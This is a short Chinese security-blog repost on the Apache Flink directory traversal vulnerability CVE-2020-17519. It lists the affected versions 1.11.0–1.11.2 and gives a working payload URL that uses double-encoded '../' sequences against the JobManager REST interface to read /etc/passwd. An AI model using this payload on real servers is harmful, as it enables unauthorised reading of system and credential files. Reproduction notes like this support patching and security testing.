搜索
Apache Flink目录穿越漏洞(CVE-2020-17519 )
统计
  • 建站日期:2015-11-11
  • 文章总数:1185 篇
  • 评论总数:0 条
  • 分类总数:38 个
  • 最后更新:4月28日

Apache Flink目录穿越漏洞(CVE-2020-17519 )

纸飞机-JAVA追梦 / / 0 评论 / 44 阅读 /0 赞
作者有点忙,还没写简介
本文阅读 1 分钟
首页 安全分享,安全工具 正文

Apache Flink 1.11.0中引入的更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。但是访问仅限于JobManager进程可访问的文件。

影响版本:
1.11.0、1.11.1、1.11.2
Payload:
192.168.198.132:8081/#/job-manager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

对/进行二次编码%252f img

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/sycamorelg/article/details/117732576
-- 展开阅读全文 --
Web安全—逻辑越权漏洞(BAC)
« 上一篇 03-13
Redis底层数据结构--简单动态字符串
下一篇 » 04-10

相关推荐

Web安全—逻辑越权漏洞(BAC)

最新Easy RCE using Docker API 复现

发表评论

成为第一个评论的人

热门文章

1
Go语言实现MSF免杀上线、思路可转换自己生成马进行绕过免杀!
1.3k 阅读 ,
2
免杀 编译shellcode进行绕过杀软操作!
1.1k 阅读 ,
3
远控免杀系列文章与工具
1k 阅读 ,
4
WEBSEC-信息收集--第一篇
920 阅读 ,

标签TAG

最近回复

我要留言